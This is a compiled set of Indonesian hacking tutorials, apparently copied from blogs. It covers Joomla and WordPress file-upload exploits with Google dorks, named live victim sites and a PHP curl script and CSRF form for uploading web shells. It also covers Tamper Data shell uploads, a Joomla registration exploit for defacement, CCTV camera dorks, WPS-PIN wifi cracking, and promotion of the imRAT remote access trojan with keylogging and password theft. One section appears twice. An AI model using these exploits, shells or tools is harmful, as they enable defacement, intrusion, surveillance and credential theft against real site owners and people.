3 = SERVER SCANNER

4 = MD5 / DASAR 64

5 = TENTANG

6 = EXIT (->)
SCAN SITUS PILIHAN :

[+] 1 = HTTPD TARIF VERSION

[+] 2 = XSS SCAN

[+] 3 = LFI SCAN

[+] 4 = RFI SCAN (JOOMLA)

[+] 5 = RFI SCAN (WORDPRESS)

[+] 6 = XSS + LFI

[+] 7 = FIND ADMIN HALAMAN

[+] 8 = KEMBALI (<-)

[+] 9 = EXIT (->)

Cara Penggunaan:

git clone https://github.com/AlisamTechnology/ATSCAN

cd ATSCAN

perl atscan.pl

Update:

cd ATSCAN git pull

SUMBER:GOOGLE.COM
17.Com_fabrik Upload Vulnerability
Metode Serangan pemahaman Com_fabrik komponen Joomla memberikan Anda kekuatan
untuk menciptakan bentuk-bentuk dan tabel yang berjalan di dalam Joomla tanpa
memerlukan pengetahuan mySQL dan PHP. Kemudian makan data Anda ke dalam Google
Maps, Charts atau AJAX berdasarkan calendar.But itu rentan :)
Menemukan Sasaran Rentan Mari kita memulainya

Dork:

inurl:? Index.php option = com_fabrik

atau index.php option = com_fabrik?

Eksploitasi: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

1.Paste yang salah dork di www.google.com.

Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian
hanya menambahkan "site: com.au" di atas google dork.

Contoh: inurl:

index.php option = com_fabrik situs:? Com.au

(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran
1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan
mengeksploitasi di belakang situs. Contoh:

Dari
http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0
&Itemid=85 Untuk

http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv
&table=1

2. Kemudian, Anda akan mendapatkan sesuatu seperti ini.


3. Sekarang upload file untuk meng-upload seperti picture.jpg atau shell.php

Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk
melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg

4. Contoh dari situs rentan ,

http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv
&tableid=1
http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fi
etype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)

http://bluejaylodgecostarica.com/media/up.php dan deface index.html contoh : ini

SUMBER:GOOGLE.COM
17.Deface CMS Joomla Dengan Metode Exploit Joomla COM_USER
2016
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan
karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.

Nah udah tau kan ?

Sekarang Tutorialnya nih.

*Bahan-Bahan :

Internet :v *Wajib

Exploit Joomla : Download Here *Wajib


(http://downloads.ziddu.com/download/25204009/exploit_Joomla.rar.html)

Notepad ++ (Notepad Biasa juga bisa) : Download Here *Wajib


(http://downloads.ziddu.com/download/25204010/npp.6.8.8.Installer.rar.html)

Dork (Nanti ane kasih dibawah) *Wajib

Teh manis / Kopi *Gak Wajib

Ok Kalo Bahan2 udah lengkap Tinggal dorknya :v

Nih Special Dork :3 :

intext:"joomla! 1.7 - Open Source Content Management" inurl:www.rankw.com+x

intext:"joomla! 1.7 - Open Source Content Management" inurl:www.rankw.ru+x

intext:"joomla! 1.7 - Open Source Content Management" inurl:sitevaluesite.net+x

intext:"joomla! 1.7 - Open Source Content Management" inurl:bname.ru+x

Note : x Diganti Dengan Domain Suatu Negara. Misal : Com, My, Id, il, ru, it

Dorknya Kembangin lagi ya >.<

Kalo Kurang Nyolong aja disono

Oke Udah kan??

Sekarang ikutin nih step stepnya ._.


Pertama Download Exploit Joomlanya, Trus dibuka pake Notepad++ / Notepad Biasa Juga
Bisa,

Edit dah Exploitnya Kaya Gini :

"NAMAMU" Diganti Dangan Nama Kalian

"USERNAMEMU" Diganti Dangan Username Kalian

"eMAIL@EMAILMU" Diganti Dangan Email Kalian

Note: Password gausah diubah

Terus Ente Nyari Target Vuln Pake Dork Diatas :)

Nih Ciri2 Joomla yang Vuln


Nah Ciri2nya begitu, Beda Garisnya antara Joomla Vuln, Sama yang Samar2

Oke Kalo udah dapet Site Yang Vuln Terus Masukin Exploit :

index.php?option=com_users&view=registration

Contohnya :

Nah, Joomla Yang Diatas Itu Biasanya Vuln


Nah Ciri2nya begitu, Beda Garisnya antara Joomla Vuln, Sama yang Samar2

Oke Kalo udah dapet Site Yang Vuln Terus Masukin Exploit :

index.php?option=com_users&view=registration

Contohnya :

Nanti Teman teman akan masuk halaman register sitenya


Terus ente klik CTRL+U / Open Source di keyboard, Lanjut klik lagi CTRL+F lalu ketik
"hidden" dan cari kode di bawah

Copy kodenya terus buka Exploit yang tadi di download pake notepad terus edit exploitnya

Edit juga sitenya di exploit dengan site vuln kamu


Terus Save dan buka Exploitnya
Trus Klik Register nanti keluar kaya gini

Nah sekarang masukin password & confirm password :D

Nah sekarang masukin password & confirm password :D


Lalu Masuk ke halaman Administratornya, http://site.com/administrator
Tinggal login pake akun Sobat >.>
Tinggal Tebas dah indexnya.

SUMBER:GOOGLE.COM
18.Cara Tamper Data (Upload PHP file)
Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang
jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu
yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan
anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit.
1. Siapakan dulu file shell.php seperti : C99Shell, r57, atau lainya cari saja di google
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data (https://addons.mozilla.org/en-us/firefox/addon/tamper-data/)

dulu di browser mozilla kita


4. Restart dan kita mulai upload
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan

6. Lalu Uploads shell.php.jpg kita dan tamper


7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg
dan rename path shell.php.jpg menjadi shell.php !
Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa
kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung .

SUMBER:GOOGLE.COM
20.Com_fabrik Upload Vulnerability
Metode Serangan pemahaman Com_fabrik komponen Joomla memberikan Anda kekuatan
untuk menciptakan bentuk-bentuk dan tabel yang berjalan di dalam Joomla tanpa
memerlukan pengetahuan mySQL dan PHP. Kemudian makan data Anda ke dalam Google
Maps, Charts atau AJAX berdasarkan calendar.But itu rentan :)
Menemukan Sasaran Rentan Mari kita memulainya.

Dork:

inurl:? Index.php option = com_fabrik

atau index.php option = com_fabrik?

Eksploitasi: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

1.Paste yang salah dork di www.google.com.

Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian
hanya menambahkan "site: com.au" di atas google dork.

Contoh: inurl:

index.php option = com_fabrik situs:? Com.au

(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran
1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan
mengeksploitasi di belakang situs. Contoh:

Dari
http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0
&Itemid=85 Untuk

http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv
&table=1

2. Kemudian, Anda akan mendapatkan sesuatu seperti ini.


3. Sekarang upload file untuk meng-upload seperti picture.jpg atau shell.php

Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk
melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg

4. Contoh dari situs rentan ,

http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv
&tableid=1
http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fi
etype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)

http://bluejaylodgecostarica.com/media/up.php dan deface index.html contoh : ini

SUMBER:GOOGLE.COM
21.Bypass shell Defacing web Wordpress type
Okey first step atau langkah pertama

langkah pertama yang harus brade lakukan jika ingin pepes website khusus nya type
wordpress ,yaitu dengan terlebih dahulu menganalisa web tersebut(lebih bagus lagi jika anda
sudah pernah menggunakanya offline pada localhost misalnya) Dengan ini setidak nya anda
sudah tau struktur folder yang ada dalam host tersebut.

setelah anda menganalisa web tersebut perhatikan fitur yang ditawarkan web type worpress
tersebut apa aja sehingga anda tau mengambil langkah apa dan dari mana dan dengan cara
apa kita bsa masuk dan Upload PHP sell kita yg sudah ready tentunya.

okey … sekarang setelah saya coba menganalisa salah satu web type wordpress(sebagai
bahan praktek kita coba yang ini aja gk usah jauh jauh ex:http://www.bekasiindependen.com)
setelah muter-muter seputar ini web saya menemukan celah di bagian ini : Plugin
EasyComment Upload

plugins/easy-comment-uploads/upload-form.php

ini bug tidak bisa saya jelaskan sekarang , bagaimana dan apa ??(butuh satu thread untuk
menjelaskan about ne bug) intinya bug ini memang sudah ada disediakan oleh Devloper
wordpress (buat para admin yg memakai wordpress coba direnungkan) nah sekarang setelah
bug nya udah dapat , coba kita susup via bug tadi dengan cara pada adress bar browser anda
ketikkan seperti:

http://[localhost]/wp-content/easy-comment-uploads/upload-form.php (localhost diganti


dengan alamat site target) jika ada pact nya masukkan eksploit sesudah patch seperti ini:

http://[localhost]/[path]/wp-content/easy-comment-uploads/upload-form.php

conto yang saya praktekan dulu, pada adress bar browser ketik seperti ini :

http://www.bekasiindependen.com/wp-content/plugins/easy-comment-uploads/upload-
form.php

enter dan….hemmm maka akan muncul window seperti gmbr berikut:

brows pada direktori anda pilih sell.php anda dan tunggu beberapa saat hingga proses loading
slesai

note*: tombol upload memang tidak ada saat anda select file itu dah auto upload kok. selanjut
nya mari kita lihat file kita tadi … lihat di bagian ini

http://www.bekasiindependen.com/wp-content/uploads/2011/07/nama file anda


sekarang apa ??? shell.php sudah slesai upload tinggal kreativitas anda selanjut nya .(*note)
jangan terlalu terpatok pada tutorial yang saya buat … kemungkinan website sudah di patch
tapi bisa kok anda kembangkan lagi semua tergantung kreaativitas anda. untuk melihat hasil
nya berikut priview sampel yang dulu saya praktekkan dan membuat saya bingung ne admin
web kmana kok ini file masih ada

http://www.bekasiindependen.com/emd5.php

Mengapa security test by md5coder karena nie post saya import dari blog saya yang satu lagi
berhubung ini lebih seo makanya saya import kesini dulunya ini saya post di blog saya yang
www.emd5coder.blogspot.com

Untuk skala besar anda bisa pake dork ini,buka google paste dork berikut silahkan dan
selamat berdeface.

“inurl:easy-comment-uploads/upload-form.php”

jika ada pertanyaan silahkan tinggalkan coment Buat Admin website.

SUMBER:GOOGLE.COM
Yah , KemBalilaGi deNgaN saYa "Malaikat Tersakiti " sebenerNya Bosen jadi BlacHat..
Sekarang "wHiteHat aja deh " Heheheheh..
Ok KaLi iNi saya Dicky Ris Wanda ingiN menYaMpaIkaN tUtOriaL cara-hack-bandwidth-warnet-dengan-
cmd.
YaH,tenTusaja ini hanya ilMu peMbelajaRan.

diMana saya menuLisKan ini hanYa untuK berBagI ilMu..

janGan lah berBuat jail di warnet yahh... nanTi ketauan Sama OP Nya kena BeCok Lo ..
wkwkwkwk

Ok tanpa baSabaSi,, LaGi kga ada kerJaan nih .. HIHIHIHIHI..


Ok ah LesT Go..
______________________________________________________________________________________
_______

Cara Hack Bandwith Warnet Dengan CMD-Bandwidth (disebut juga Data Transfer atau Site
Traffic) adalah data yang keluar+masuk/upload+download ke account anda.

Contoh: Ketika anda menerima/mengirim email, asumsikan besarnya email yang


diterima/dikirim adalah 4 KB, berarti secara teori, untuk bandwidth 1.000 MB (1.000.000
KB) anda bisa *kirim* 250.000 email atau berbagai variasi antara kirim/terima, misalnya
100.000 kirim, 150.000 terima. Ini hanya contoh untuk penjelasan bandwidth, pada
kenyataannya, data yang keluar masuk ke account bisa datang dari pengunjung (yang
mendownload halaman website ke PC-nya), atau anda upload gambar/file ke account dan
sebagainya.

Bandwidth/Site Traffic dihitung per bulan & bisa dilihat di cPanel.

Jika anda mengenal Telkom Speedy, Bandwidth ini cara kerjanya sama dengan Kuota di
Telkom Speedy. Hanya saja yang menjadi acuan bagi perhitungan kuota Telkom Speedy
adalah data yang keluar/masuk ke PC/Modem ADSL anda, sedangkan di hosting acuannya
adalah data yang keluar/masuk ke account.

Pada dasarnya sistem operasi windows sudah membatasi bandwidth untuk koneksi internet
sebanyak 20% dari total bandwidth yang seharusnya bisa maksimal, oleh karena itu jka anda
ingin hacking bandwidth warnet supaya koneksinya terasa lebih cepat & kencang, bisa
dengan cara mengurangi atau mengosongkan batasan bandwidth limit bandwidth tersebut
supaya pada Windows kita bisa maksimal dalam menggunakanbandwidth yang sudah ada.
Bayangkan aja bro..udah gak usah dibayangain tapi langsung TKP :)

Kalau seandainya bandwidth warnet 2mb masuk ke komputer lo semua, wah kalau buat
download kenceng abis sob. semoga aja gpedit.msc nya gk di block sama yang punya
warnet. Saat pergi kewarnet berdo’a dulu & jangan lupa berlagak seperti orang baru belajar
komputer biar pemilik warnet gak curiga..ckckckckk :)

santai dalam bertindak …

santai kayak dipantai …

slow kayak dipulau...

Untuk hack bandwidth warnet ikuti petunjuknya seperti dibawah ini :

1. Klik Start

2. Klik Run

3. Ketik gpedit.msc

4. Kemudian klik Ok

5. Setelah masuk klik Administrative Templates

6. Kemudian Klik Network

7. Setelah terbuka klik QoS Packet scheduler

8. Kemudian klik Limit Reservable Bandwidth

9. Dan setelah terbuka ubah setting menjadi Enable

10. Kemudian ubah Bandwidth Limitnya menjadi 0

11. Klik Apply,ok

12. Kemudian keluar dan Restart komputer

Kalau pemilik warnet mendisable Run, pakai cmd juga bisa

ketikan :
C:>gpedit.msc;

lanjutkan dilangkah ke-5 diatas pasti bisa …

kalau masih gak bisa ni gue kasih cara lain

pencet tombol Alt+f4 sampai keDekstop lalu ke Start à Shutdown ,bayar warnet ,pulang
kerumah aja haha...

Semoga komputer yang anda sewa bisa terasa lebih cepat koneksinya internet kayak petir
lewat wkwkwk...

PeRINGATAN KERAS...!!!!

Kalomaucopy,Copyaja..

jangan di Edit hak ciPtanya yah...

Credit : Anonboy

SUMBER: MALAIKAT TERSAKITI AND ACT ACEH CYBER TEAM


23.Tutorial Deface Dengan Com_Adsmanager
TUTORIAL :D
Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

(kembangin lagi bro, biar banyak dpt web yg verawan and vuln)

- Masukan Dork di google, dan lalu pilih 1 web

Exploit: /index.php?option=com_adsmanager&task=upload&tmpl=component

- pastekan Exploit diatas ke web target yang baru sobat pilih..

contoh:
www.target.co.li//index.php?option=com_adsmanager&task=upload&tmpl=compone
nt

Tanda vuln :{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}

(atau kurang lebih seperti di gambar)

Save source code php dibawah:


<?php

$url = "target/index.php?option=com_adsmanager&task=upload&tmpl=component";
// put URL Here

$post = array

"file" => "@shell.jpg",

"name" => "shell.php"

);

$ch = curl_init ("$url");

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0)


Gecko/20100101 Firefox/32.0");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt ($ch, CURLOPT_POST, 1);

@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);

$data = curl_exec ($ch);

curl_close ($ch);

echo $data;

?>

target dan shell ganti dgn url web target sobat, dan nama shell milik sobat.
lalu save dgn ekstensi php, di folder /XAMPP/PHP/ yang sudah terinstall di laptop
kalian masing2.

lalu copy juga file shell sobat di folder /XAMPP/PHP/.

- Lalu jika sudah di save, aktifkan apache pada XAMPP

- lalu buka CMD dan ketikan.

cd C:/xampp/php

php namasourcecodeanda.php

- Jika muncul akan keluar nama shell sobat

(kurang lebihnya seperti digambar)

- Acces Shell: target.co.li/tmp/plupload/namashellsobat.php


Jika sudah masuk ke shell sobat, seterah deh mau diapain

#Script CSRF Upload :

<form method="POST"
action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"

enctype="multipart/form-data">

<input type="file" name="files[]" /><button>Upload</button>

</form>
*save dengan ekstensi .html (contoh.html)

*klik ~> pilih shell sobat ~> upload

*letak shell juga sama seperti contoh diatas

Okeh Sekian tutorial artikel yang saya bahas kali ini.

sumber: tkjcyberart.blogspot.co.id
24.TEKNIK HACK CCTV
1. Buka link ini:
GOOGLE.COM

2. Masukan ini pada kotak pencarian


” inurl:/view/index.shtml “
atau
” intitle:liveapplet inurl:LvAppl “
tanpa tanda kutip

3. Kemudian klik pencarian google akan menunjukan daftar items yang di cari.
kemudian masuklah ke salah satu link
tersebut……ada beberapa yang tidak
bekerja anda akan dapat melihat kamera lalu-lintas di sini tidak hanya itu..anda juga bisa
mengontrolnya,menggerakan ke kiri dan ke kanan juga bisa di zoom akan sangat
menyenangkan,bukan ? yang pasti anda membutuhkan koneksi yang sangat cepat semoga
bermanfaat dork yang lain:

inurl:”CgiStart?page=”
inurl:/view.shtml
intitle:”Live View / – AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtmlliveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera
NetworkCamera” (disconnected)
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=M
otion” (disconnected)
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.
com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image” (disconnected)
intitle:”i-Catcher Console – Web Monitor”
inurl :”CgiStart?page=Top Language=0″

SUMBER:GOOGLE.COM
25.CARA HACK WIFI DENGAN JUMPSTART + WPS-PIN
99%WORK
1. Jumpstart

bisa kalian download

Disini (http://www.tusfiles.net/w312q8xp7p59)

atau

Alternatif

2. Wpspin

bisa kalian download

Disini (http://www.tusfiles.net/yhu7sb3tuokq)

atau

Alternatif

Lanjut ke tutorial

Pertama extrack kedua file yang telah di download , lalu siapkan wifi yang tidak di ketahui
passwordnya

Saya ambil contoh wifi nya adalah KUMBANG


Lalu saya coba connect muncul seperti ini

Selanjutnya buka wpspin

Agar angka pada kolom Pin 1,2,3 nya keluar centang bagian yang saya lingkari merah

kalau sudah keluar klik dua kali pin 1 pada barisan wifi yang ingin di hack

lalu akan muncul seperti ini, terus copy angka pada pin 1, lihat gambar
Kalau sudah di copy pin 1 nya, lanjut buka jumpstartnya

lalu pilih join a wireless network, next

pilih enter the pin from my acces point,

masukan pin tadi di kolom acces point pin, next

Tunggu sebentar man


Kalo udah berhasil bakal muncul gambar kayak dibawah ini

Terus cek deh koneksinya,

Kalo udah konek tinggal intip aja passwordnya,,

SUMBER:GOOGLE.COM
26.Imrat Hack komputer Jarak Jauh

Pada pagi hari ini dengan cuaca panas kami Team Malaikat Tersakiti akan membagikan
applikasi yang jarang kali lihat walaupun nama applikasi ini sudah sangat terkenal aplikasi ini
akan saya bagi gratis ini tool ini bernama Imrat versi 0.4 final langsung aja ke TKP.

imRAT v0.4 final

imRAT v0.4 final adalah tool remote administrator yang berguna untuk melihat dan
mengendalikan komputer jarakjauh tanpa diketahui target, tool ini cocok untuk memata-matai
musuh, cyber war (botnet ddos) , hack akun (facebook, twitter, instagram, gmail dll) melalui
"lihat password ataupun keylogger.

Fitur pada imRAT 0.4 final

1. Menejer file : melihat, membuat, upload, download, hapus dll pada pc korban

2. Buka file :

- Melalui Link

- Melalui Disk

- Script : vbs, html, bat, txt dll

3. Kendalikan desktop

4. Kendalikan Kamera /cam

5. Kendalikan cmd bisa untuk bot ddos

6. Proses menejer/task menejer

7. Keylogger : melihat apa saja yang telah diketik di pc target

8. Buat Pesan : untuk chat langsung dengan korban

9. Lihat Password : melihat semua password yang tersimpan di app browser

10. Server :
- Perbaharui : Perbaharui melalui Link , Perbaharui melalui Disk

- Memulai kembali

- Hapus Server

- Putuskan jaringan

- Ganti nama

- Keluarkan

11. Buka folder untuk melihat history pada folder "korban".

Syarat penggunaan :

1. Harus menggunkan kuota asli , tidak untuk ssh, vpn

2. pptp VPN open port atau bisa juga dengan TP-LINK untuk open port

3. akun on-ip

4. imrat

5.untuk tutorial video ada di bawah artikel

6. aplikasi ini mudah terdektesi antivirus jadi wajib matikan antivirus

7.untuk server Rat nya biyar tidak mudah terdektesi antivirus ketika mau di share bisa
menggunakan Crypter

DOWNLOAD DI SINI

PASS: malaikat tersakiti

YANG MAU GABUNG DENGAN PENGGILA RAT MASUK AJA KE GRUB KAMI

UNTUK TOOL HACKING KALIAN BISA AKES KE MALAIKAT TERSAKITI.

http://malaikattersakiti.blogspot.co.id/

Anda mungkin juga menyukai